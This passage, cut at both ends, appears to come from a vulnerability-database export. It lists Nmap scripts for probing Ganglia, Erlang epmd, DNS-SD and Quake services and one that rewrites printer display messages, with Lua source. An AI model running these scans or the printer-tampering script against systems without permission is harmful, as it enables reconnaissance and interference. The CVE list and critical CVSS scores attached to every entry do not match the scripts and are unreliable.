os_release: 3.1.9-vs2.3.2.5\n | proc_run: 0\n | load_five: 0.52\n | gexec: OFF\n | disk_free: 305.765GB\n | mem_cached: 18857264KB\n | pkts_in: 821.73packets/sec\n | bytes_in: 72686.10bytes/sec\n | bytes_out: 5612221.50bytes/sec\n | swap_total: 1998844KB\n | mem_free: 187964KB\n | load_fifteen: 0.57\n | os_name: Linux\n | boottime: 1429708366s\n | cpu_idle: 96.3%\n | cpu_user: 2.7%\n | cpu_nice: 0.0%\n | cpu_aidle: 94.7%\n | mem_buffers: 169588KB\n | cpu_system: 0.8%\n | part_max_used: 31.5%\n | disk_total: 435.962GB\n | mem_shared: 0KB\n | cpu_wio: 0.2%\n | machine_type: x86_64\n | proc_total: 1027\n | cpu_num: 8CPUs\n | cpu_speed: 2400MHz\n | pkts_out: 3977.13packets/sec\n | swap_free: 1393392KB\n \n\n## Requires \n\n * [comm](<../lib/comm.html>)\n * [shortport](<../lib/shortport.html>)\n * [slaxml](<../lib/slaxml.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-10-04T05:45:54", "type": "nmap", "title": "ganglia-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2019-06-27T19:13:41", "id": "NMAP:GANGLIA-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/ganglia-info.html", "sourceData": "local comm = require \"comm\"\nlocal shortport = require \"shortport\"\nlocal slaxml = require \"slaxml\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nRetrieves system information (OS version, available memory, etc.) from\na listening Ganglia Monitoring Daemon or Ganglia Meta Daemon.\n\nGanglia is a scalable distributed monitoring system for high-performance\ncomputing systems such as clusters and Grids. The information retrieved\nincludes HDD size, available memory, OS version, architecture (and more) from\neach of the systems in each of the clusters in the grid.\n\nFor more information about Ganglia, see:\n* http://ganglia.sourceforge.net/\n* http://en.wikipedia.org/wiki/Ganglia_(software)#Ganglia_Monitoring_Daemon_.28gmond.29\n* http://en.wikipedia.org/wiki/Ganglia_(software)#Ganglia_Meta_Daemon_.28gmetad.29\n]]\n\n---\n-- @usage\n-- nmap --script ganglia-info --script-args ganglia-info.timeout=60,ganglia-info.bytes=1000000 -p <port> <target>\n--\n-- @args ganglia-info.timeout\n-- Set the timeout in seconds. The default value is 30.\n-- @args ganglia-info.bytes\n-- Set the number of bytes to retrieve. The default value is 1000000.\n-- This should be enough for a grid of more than 100 hosts.\n-- About 5KB-10KB of data is returned for each host in the cluster.\n--\n-- @output\n-- 8649/tcp open unknown syn-ack\n-- | ganglia-info:\n-- | Ganglia Version: 3.1.7\n-- | Cluster 1:\n-- | Name: unspecified\n-- | Owner: unspecified\n-- | Host 1:\n-- | Name: sled9735.sd.dreamhost.com\n-- | IP: 10.208.42.221\n-- | load_one: 0.53\n-- | mem_total: 24685564KB\n-- | os_release: 3.1.9-vs2.3.2.5\n-- | proc_run: 0\n-- | load_five: 0.52\n-- | gexec: OFF\n-- | disk_free: 305.765GB\n-- | mem_cached: 18857264KB\n-- | pkts_in: 821.73packets/sec\n-- | bytes_in: 72686.10bytes/sec\n-- | bytes_out: 5612221.50bytes/sec\n-- | swap_total: 1998844KB\n-- | mem_free: 187964KB\n-- | load_fifteen: 0.57\n-- | os_name: Linux\n-- | boottime: 1429708366s\n-- | cpu_idle: 96.3%\n-- | cpu_user: 2.7%\n-- | cpu_nice: 0.0%\n-- | cpu_aidle: 94.7%\n-- | mem_buffers: 169588KB\n-- | cpu_system: 0.8%\n-- | part_max_used: 31.5%\n-- | disk_total: 435.962GB\n-- | mem_shared: 0KB\n-- | cpu_wio: 0.2%\n-- | machine_type: x86_64\n-- | proc_total: 1027\n-- | cpu_num: 8CPUs\n-- | cpu_speed: 2400MHz\n-- | pkts_out: 3977.13packets/sec\n-- | swap_free: 1393392KB\n--\n-- @xmloutput\n-- <elem key=\"Ganglia Version\">3.1.7</elem>\n-- <table key=\"Cluster 1\">\n-- <elem key=\"Name\">unspecified</elem>\n-- <elem key=\"Owner\">unspecified</elem>\n-- <table key=\"Host 1\">\n-- <elem key=\"Name\">sled9735.sd.dreamhost.com</elem>\n-- <elem key=\"IP\">10.208.42.221</elem>\n-- <elem key=\"load_one\">0.53</elem>\n-- <elem key=\"mem_total\">24685564KB</elem>\n-- <elem key=\"os_release\">3.1.9-vs2.3.2.5</elem>\n-- <elem key=\"proc_run\">0</elem>\n-- <elem key=\"load_five\">0.52</elem>\n-- <elem key=\"gexec\">OFF</elem>\n-- <elem key=\"disk_free\">305.765GB</elem>\n-- <elem key=\"mem_cached\">18857264KB</elem>\n-- <elem key=\"pkts_in\">821.73packets/sec</elem>\n-- <elem key=\"bytes_in\">72686.10bytes/sec</elem>\n-- <elem key=\"bytes_out\">5612221.50bytes/sec</elem>\n-- <elem key=\"swap_total\">1998844KB</elem>\n-- <elem key=\"mem_free\">187964KB</elem>\n-- <elem key=\"load_fifteen\">0.57</elem>\n-- <elem key=\"os_name\">Linux</elem>\n-- <elem key=\"boottime\">1429708366s</elem>\n-- <elem key=\"cpu_idle\">96.3%</elem>\n-- <elem key=\"cpu_user\">2.7%</elem>\n-- <elem key=\"cpu_nice\">0.0%</elem>\n-- <elem key=\"cpu_aidle\">94.7%</elem>\n-- <elem key=\"mem_buffers\">169588KB</elem>\n-- <elem key=\"cpu_system\">0.8%</elem>\n-- <elem key=\"part_max_used\">31.5%</elem>\n-- <elem key=\"disk_total\">435.962GB</elem>\n-- <elem key=\"mem_shared\">0KB</elem>\n-- <elem key=\"cpu_wio\">0.2%</elem>\n-- <elem key=\"machine_type\">x86_64</elem>\n-- <elem key=\"proc_total\">1027</elem>\n-- <elem key=\"cpu_num\">8CPUs</elem>\n-- <elem key=\"cpu_speed\">2400MHz</elem>\n-- <elem key=\"pkts_out\">3977.13packets/sec</elem>\n-- <elem key=\"swap_free\">1393392KB</elem>\n-- </table>\n-- </table>\n--\n-- Version 0.2\n-- Created 2011-06-28 - v0.1 - created by Brendan Coles - itsecuritysolutions.org\n-- Created 2015-07-30 - v0.2 - Added Support for SLAXML by Gyanendra Mishra\n\nauthor = {\"Brendan Coles\", \"Gyanendra Mishra\"}\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"default\", \"discovery\", \"safe\"}\n\nportrule = shortport.port_or_service ({8649,8651}, \"ganglia\", {\"tcp\"})\n\nlocal function set_name_value(name)\n return function(value, state)\n state.result[name] = value\n end\nend\n\nlocal function set_cluster(name)\n return function(value, state)\n local current = state[#state]\n if not current.out then\n state.cc = state.cc + 1\n current.out = stdnse.output_table()\n current.hc = 0\n state.result[\"Cluster \" .. state.cc] = current.out\n end\n state.result[\"Cluster \" .. state.cc][name] = value\n end\nend\n\nlocal function get_current_cluster(state)\n for i=#state, 1, -1 do\n if state[i][1] == \"CLUSTER\" then\n return state[i]\n end\n end\nend\n\nlocal function set_host(name)\n return function(value, state)\n local current = state[#state]\n local current_cluster = get_current_cluster(state)\n if not current.out then\n current_cluster.hc = current_cluster.hc + 1\n current.out = stdnse.output_table()\n state.result[\"Cluster \" .. state.cc][\"Host \" .. current_cluster.hc] = current.out\n end\n state.result[\"Cluster \" .. state.cc][\"Host \" .. current_cluster.hc][name] = value\n end\nend\n\nlocal function set_metric(name)\n return function(value, state)\n local current = state[#state]\n local current_cluster = get_current_cluster(state)\n current[name] = value\n if current[\"name\"] and current[\"value\"] and current[\"unit\"] then\n state.result[\"Cluster \" .. state.cc][\"Host \" .. current_cluster.hc][current[\"name\"]] = current[\"value\"] .. current[\"unit\"]\n end\n end\nend\n\nlocal P = {\n GANGLIA_XML = {\n VERSION = set_name_value(\"Ganglia Version\"),\n },\n GRID = {\n NAME = set_name_value(\"Grid Name\"),\n },\n CLUSTER = {\n NAME = set_cluster(\"Name\"),\n OWNER = set_cluster(\"Owner\"),\n },\n HOST = {\n NAME = set_host(\"Name\"),\n IP = set_host(\"IP\"),\n },\n METRIC = {\n NAME = set_metric(\"name\"),\n UNITS = set_metric(\"unit\"),\n VAL = set_metric(\"value\"),\n }\n}\n\naction = function( host, port )\n\n local result = stdnse.output_table()\n\n -- Set timeout\n local timeout = stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME .. '.timeout'))\n timeout = timeout or 30\n\n -- Set bytes\n local bytes = stdnse.get_script_args(SCRIPT_NAME .. '.bytes')\n bytes = tonumber(bytes) or 1000000\n\n -- Retrieve grid data in XML format over TCP\n stdnse.debug1(\"Connecting to %s:%s\", host.targetname or host.ip, port.number)\n local status, data = comm.get_banner(host, port, {request_timeout=timeout*1000,bytes=bytes})\n if not status then\n stdnse.debug1(\"Timeout exceeded for %s:%s (Timeout: %ss).\", host.targetname or host.ip, port.number, timeout)\n return\n end\n\n local state = {\n cc = 0,\n result=stdnse.output_table()\n }\n\n local parser = slaxml.parser:new()\n parser._call = {\n startElement = function(name) table.insert(state, {name}) end,\n closeElement = function(name) assert(state[#state][1] == name) state[#state] = nil end,\n attribute = function(name, value)\n local p_elem = P[state[#state][1]]\n if not (p_elem and p_elem[name]) then return end\n local p_attr = p_elem[name]\n if not p_attr then return end\n p_attr(value, state)\n end,\n }\n\n parser:parseSAX(data, {stripWhitespace=true})\n\n if #state.result then return state.result end\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:38:32", "description": "Retrieves or sets the ready message on printers that support the Printer Job Language. This includes most PostScript printers that listen on port 9100\\. Without an argument, displays the current ready message. With the `pjl_ready_message` script argument, displays the old ready message and changes it to the message given.\n\n## Script Arguments \n\n#### pjl_ready_message \n\nReady message to display.\n\n## Example Usage \n \n \n nmap --script=pjl-ready-message.nse \\\n --script-args='pjl_ready_message=\"your message here\"'\n\n## Script Output \n \n \n 9100/tcp open jetdirect\n |_ pjl-ready-message: \"READY\" changed to \"p0wn3d pr1nt3r\"\n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2009-07-16T22:46:45", "type": "nmap", "title": "pjl-ready-message NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2020-11-14T23:29:05", "id": "NMAP:PJL-READY-MESSAGE.NSE", "href": "https://nmap.org/nsedoc/scripts/pjl-ready-message.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\n\ndescription = [[\nRetrieves or sets the ready message on printers that support the Printer\nJob Language. This includes most PostScript printers that listen on port\n9100. Without an argument, displays the current ready message. With the\n<code>pjl_ready_message</code> script argument, displays the old ready\nmessage and changes it to the message given.\n]]\n\n---\n-- @arg pjl_ready_message Ready message to display.\n-- @output\n-- 9100/tcp open jetdirect\n-- |_ pjl-ready-message: \"READY\" changed to \"p0wn3d pr1nt3r\"\n-- @usage\n-- nmap --script=pjl-ready-message.nse \\\n-- --script-args='pjl_ready_message=\"your message here\"'\n\nauthor = \"Aaron Leininger\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"intrusive\"}\n\nportrule = shortport.port_or_service(9100, \"jetdirect\")\n\nlocal function parse_response(response)\n local msg\n local line\n\n for line in response:gmatch(\".-\\n\") do\n msg = line:match(\"^DISPLAY=\\\"(.*)\\\"\")\n if msg then\n return msg\n end\n end\nend\n\naction = function(host, port)\n\n local status --to be used to grab the existing status of the display screen before changing it.\n local newstatus --used to repoll the printer after setting the display to check that the probe worked.\n local statusmsg --stores the PJL command to get the printer's status\n local response --stores the response sent over the network from the printer by the PJL status command\n\n statusmsg=\"@PJL INFO STATUS\\r\\n\"\n\n local rdymsg=\"\" --string containing text to send to the printer.\n local rdymsgarg=\"\" --will contain the argument from the command line if one exists\n\n local socket = nmap.new_socket()\n socket:set_timeout(15000)\n local try = nmap.new_try(function() socket:close() end)\n try(socket:connect(host, port))\n try(socket:send(statusmsg)) --this block gets the current display status\n local data\n response,data=socket:receive()\n if not response then --send an initial probe. If no response, send nothing further.\n socket:close()\n if nmap.verbosity() > 0 then\n return \"No response from printer: \"..data\n else\n return nil\n end\n end\n\n status = parse_response(data)\n if not status then\n if nmap.verbosity() > 0 then\n return \"Error reading printer response: \"..data\n else\n return nil\n end\n end\n\n rdymsgarg = nmap.registry.args.pjl_ready_message\n if not rdymsgarg then\n if status then\n return \"\\\"\"..status..\"\\\"\"\n else\n return nil\n end\n end\n\n rdymsg=\"@PJL RDYMSG DISPLAY = \\\"\"..rdymsgarg..\"\\\"\\r\\n\"\n try(socket:send(rdymsg)) --actually set the display message here.\n\n try(socket:send(statusmsg)) --this block gets the status again for comparison\n response,data=socket:receive()\n if not response then\n socket:close()\n return \"\\\"\"..status..\"\\\"\"\n end\n newstatus=parse_response(data)\n if not newstatus then\n socket:close()\n return \"\\\"\"..status..\"\\\"\"\n end\n\n socket:close()\n\n return \"\\\"\"..status..\"\\\" changed to \\\"\"..newstatus..\"\\\"\"\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:45:30", "description": "Connects to Erlang Port Mapper Daemon (epmd) and retrieves a list of nodes with their respective port numbers.\n\n## Example Usage \n \n \n nmap -p 4369 --script epmd-info <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 4369/tcp open epmd\n | epmd-info.nse:\n | epmd_port: 4369\n | nodes:\n | rabbit: 36804\n |_ ejabberd: 46540\n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-04-04T18:28:33", "type": "nmap", "title": "epmd-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-03-25T13:29:52", "id": "NMAP:EPMD-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/epmd-info.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\n\ndescription = [[\nConnects to Erlang Port Mapper Daemon (epmd) and retrieves a list of nodes with their respective port numbers.\n]]\n\n---\n-- @usage\n-- nmap -p 4369 --script epmd-info <target>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 4369/tcp open epmd\n-- | epmd-info.nse:\n-- | epmd_port: 4369\n-- | nodes:\n-- | rabbit: 36804\n-- |_ ejabberd: 46540\n-- @xmloutput\n-- <elem key=\"epmd_port\">4369</elem>\n-- <table key=\"nodes\">\n-- <elem key=\"rabbit\">36804</elem>\n-- <elem key=\"ejabberd\">46540</elem>\n-- </table>\n\nauthor = \"Toni Ruottu\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"default\", \"discovery\", \"safe\"}\n\nportrule = shortport.port_or_service (4369, \"epmd\")\n\naction = function(host, port)\n local socket = nmap.new_socket()\n socket:set_timeout(stdnse.get_timeout(host))\n local try = nmap.new_try(function () socket:close() end)\n try(socket:connect(host, port))\n\n try(socket:send(\"\\x00\\x01n\")) -- NAMESREQ = 110\n\n local getline = stdnse.make_buffer(socket, \"\\n\")\n\n local data, err = getline()\n if data == nil then\n stdnse.debug2(\"Error on receive: %s\", err)\n socket:close()\n return nil\n end\n\n local realport, pos = string.unpack(\">I4\", data)\n data = string.sub(data, pos)\n\n local nodes = stdnse.output_table()\n local name, port\n while data and data ~= \"\" do\n name, port = data:match(\"^name (.*) at port (%d+)\")\n if name then\n nodes[name] = port\n end\n data = getline()\n end\n\n local response = stdnse.output_table()\n response.epmd_port = realport\n response.nodes = nodes\n return response\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:45:44", "description": "Attempts to discover target hosts' services using the DNS Service Discovery protocol. \n\nThe script first sends a query for _services._dns-sd._udp.local to get a list of services. It then sends a followup query for each one to try to get more information.\n\n## Script Arguments \n\n#### max-newtargets, newtargets \n\nSee the documentation for the [target](<../lib/target.html#script-args>) library. \n\n#### dnssd.services \n\nSee the documentation for the [dnssd](<../lib/dnssd.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script=dns-service-discovery -p 5353 <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 5353/udp open zeroconf udp-response\n | dns-service-discovery:\n | 548/tcp afpovertcp\n | model=MacBook5,1\n | Address=192.168.0.2 fe80:0:0:0:223:6cff:1234:5678\n | 3689/tcp daap\n | txtvers=1\n | iTSh Version=196609\n | MID=0xFB5338C04123456\n | Database ID=6FA9761FE123456\n | dmv=131078\n | Version=196616\n | OSsi=0x1F6\n | Machine Name=Patrik Karlsson\\xE2\\x80\\x99s Library\n | Media Kinds Shared=1\n | Machine ID=8945A7123456\n | Password=0\n |_ Address=192.168.0.2 fe80:0:0:0:223:6cff:1234:5678\n\n## Requires \n\n * [dnssd](<../lib/dnssd.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-01-21T01:53:46", "type": "nmap", "title": "dns-service-discovery NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:DNS-SERVICE-DISCOVERY.NSE", "href": "https://nmap.org/nsedoc/scripts/dns-service-discovery.html", "sourceData": "local dnssd = require \"dnssd\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\n\ndescription=[[\nAttempts to discover target hosts' services using the DNS Service Discovery protocol.\n\nThe script first sends a query for _services._dns-sd._udp.local to get a\nlist of services. It then sends a followup query for each one to try to\nget more information.\n]]\n\n\n---\n-- @usage\n-- nmap --script=dns-service-discovery -p 5353 <target>\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 5353/udp open zeroconf udp-response\n-- | dns-service-discovery:\n-- | 548/tcp afpovertcp\n-- | model=MacBook5,1\n-- | Address=192.168.0.2 fe80:0:0:0:223:6cff:1234:5678\n-- | 3689/tcp daap\n-- | txtvers=1\n-- | iTSh Version=196609\n-- | MID=0xFB5338C04123456\n-- | Database ID=6FA9761FE123456\n-- | dmv=131078\n-- | Version=196616\n-- | OSsi=0x1F6\n-- | Machine Name=Patrik Karlsson\\xE2\\x80\\x99s Library\n-- | Media Kinds Shared=1\n-- | Machine ID=8945A7123456\n-- | Password=0\n-- |_ Address=192.168.0.2 fe80:0:0:0:223:6cff:1234:5678\n\n\n-- Version 0.7\n-- Created 01/06/2010 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n-- Revised 01/13/2010 - v0.2 - modified to use existing dns library instead of mdns, changed output to be less DNS like\n-- Revised 02/01/2010 - v0.3 - removed incorrect try/catch statements\n-- Revised 10/04/2010 - v0.4 - added prerule and add target support <patrik@cqure.net>\n-- Revised 10/05/2010 - v0.5 - added ip sort function and\n-- Revised 10/10/2010 - v0.6 - multicast queries are now used in parallel to collect service information <patrik@cqure.net>\n-- Revised 10/29/2010 - v0.7 - factored out most of the code to dnssd library\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"default\", \"discovery\", \"safe\"}\n\n\nportrule = shortport.portnumber(5353, \"udp\")\n\naction = function(host, port)\n local helper = dnssd.Helper:new( host, port )\n local status, result = helper:queryServices()\n\n if ( status ) then\n -- set port to open\n nmap.set_port_state(host, port, \"open\")\n return stdnse.format_output(true, result)\n end\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:37:34", "description": "Extracts information from Quake game servers and other game servers which use the same protocol. \n\nQuake uses UDP packets, which because of source spoofing can be used to amplify a denial-of-service attack. For each request, the script reports the payload amplification as a ratio. The format used is `response_bytes/request_bytes=ratio`\n\n<http://www.gamers.org/dEngine/quake/QDP/qnp.html>\n\n## Example Usage \n \n \n nmap -n -sU -Pn --script quake1-info -pU:26000-26004 -- <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 26000/udp open quake\n | quake1-info:\n | server info exchange payload amplification: 59/12=4.916667\n | listen address: 10.200.200.10:26000\n | server name: An anonymous Debian server\n | level name: dm1\n | players: 1/8\n | player table\n | player 1: fragmeister\n | player info exchange payload amplification: 49/6=8.166667\n | client address: 192.168.0.10:40430\n | connect time: 55587 secs\n | frags: -1\n | shirt: green3\n | pants: orange6\n |_ protocol version: released (0x3)\n \n\n## Requires \n\n * [comm](<../lib/comm.html>)\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2014-03-07T17:28:40", "type": "nmap", "title": "quake1-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-05T21:57:41", "id": "NMAP:QUAKE1-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/quake1-info.html", "sourceData": "local comm = require \"comm\"\nlocal nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nExtracts information from Quake game servers and other game servers\nwhich use the same protocol.\n\nQuake uses UDP packets, which because of source spoofing can be used to amplify\na denial-of-service attack. For each request, the script reports the payload\namplification as a ratio. The format used is\n<code>response_bytes/request_bytes=ratio</code>\n\nhttp://www.gamers.org/dEngine/quake/QDP/qnp.html\n]]\n\n---\n-- @usage\n-- nmap -n -sU -Pn --script quake1-info -pU:26000-26004 -- <target>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 26000/udp open quake\n-- | quake1-info:\n-- | server info exchange payload amplification: 59/12=4.916667\n-- | listen address: 10.200.200.10:26000\n-- | server name: An anonymous Debian server\n-- | level name: dm1\n-- | players: 1/8\n-- | player table\n-- | player 1: fragmeister\n-- | player info exchange payload amplification: 49/6=8.166667\n-- | client address: 192.168.0.10:40430\n-- | connect time: 55587 secs\n-- | frags: -1\n-- | shirt: green3\n-- | pants: orange6\n-- |_ protocol version: released (0x3)\n--\n-- @xmloutput\n-- <elem key=\"server_ratio\">59/12=4.916667</elem>\n-- <elem key=\"listen_address\">10.200.200.10:26000</elem>\n-- <elem key=\"server_name\">An anonymous Debian server</elem>\n-- <elem key=\"level_name\">dm1</elem>\n-- <elem key=\"players\">1/8</elem>\n-- <table key=\"player_table\">\n-- <table key=\"player 1\">\n-- <elem key=\"player_ratio\">49/6=8.166667</elem>\n-- <elem key=\"name\">fragmeister</elem>\n-- <elem key=\"client_address\">192.168.0.10:40430</elem>\n-- <elem key=\"connect_time\">55587 secs</elem>\n-- <elem key=\"frags\">-1</elem>\n-- <elem key=\"shirt\">green3</elem>\n-- <elem key=\"pants\">orange6</elem>\n-- </table>\n-- </table>\n-- <elem key=\"protocol_version\">released (0x3)</elem>\n\n\ncategories = {\"default\", \"discovery\", \"safe\", \"version\"}\nauthor = \"Ulrik Haugen\"\ncopyright = \"Link\u00f6pings universitet 2014, Ulrik Haugen 2014\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\n\n--- Proceed with action on open/open|filtered udp ports in interval\n-- [26000, 26004] and whatever Quake is listed under in nmap-services.\nfunction portrule(host, port)\n return (port.state == 'open' or port.state == 'open|filtered')\n and port.protocol == 'udp'\n and ((26000 <= port.number and port.number <= 26004)\n or port.service == 'quake')\n and nmap.version_intensity() >= 7\nend\n\n\n--- Like assert but put /message/ in the ERROR key in /results_table/ to\n-- better suit collate_results and pass 0 as level to error to ensure\n-- the error message will not be prefixed with file and line number.\n-- /results_table/ may be left out.\nlocal function assert_w_table(condition, message, results_table)\n if condition then\n return condition\n else\n results_table = results_table or {}\n results_table.ERROR = message\n error(results_table, 0)\n end\nend\n\n\n-- Protocol constants and tables.\nlocal ctrl_pkt_type = 0x8000\nlocal ccreq_server_info = 0x02\nlocal ccrep_server_info = 0x83\nlocal ccreq_player_info = 0x03\nlocal ccrep_player_info = 0x84\nlocal game_name = \"QUAKE\"\nlocal net_protocol_versions = {\n [ 0x01 ] = \"qtest1\",\n [ 0x02 ] = \"unknown\",\n [ 0x03 ] = \"released\"\n}\nlocal net_protocol_released = 0x03\nlocal color_codes = {\n [ 0x0 ] = \"gray0\",\n [ 0x1 ] = \"brown1\",\n [ 0x2 ] = \"lavender2\",\n [ 0x3 ] = \"green3\",\n [ 0x4 ] = \"red4\",\n [ 0x5 ] = \"light green5\",\n [ 0x6 ] = \"orange6\",\n [ 0x7 ] = \"light brown7\",\n [ 0x8 ] = \"violet8\",\n [ 0x9 ] = \"pink9\",\n [ 0xa ] = 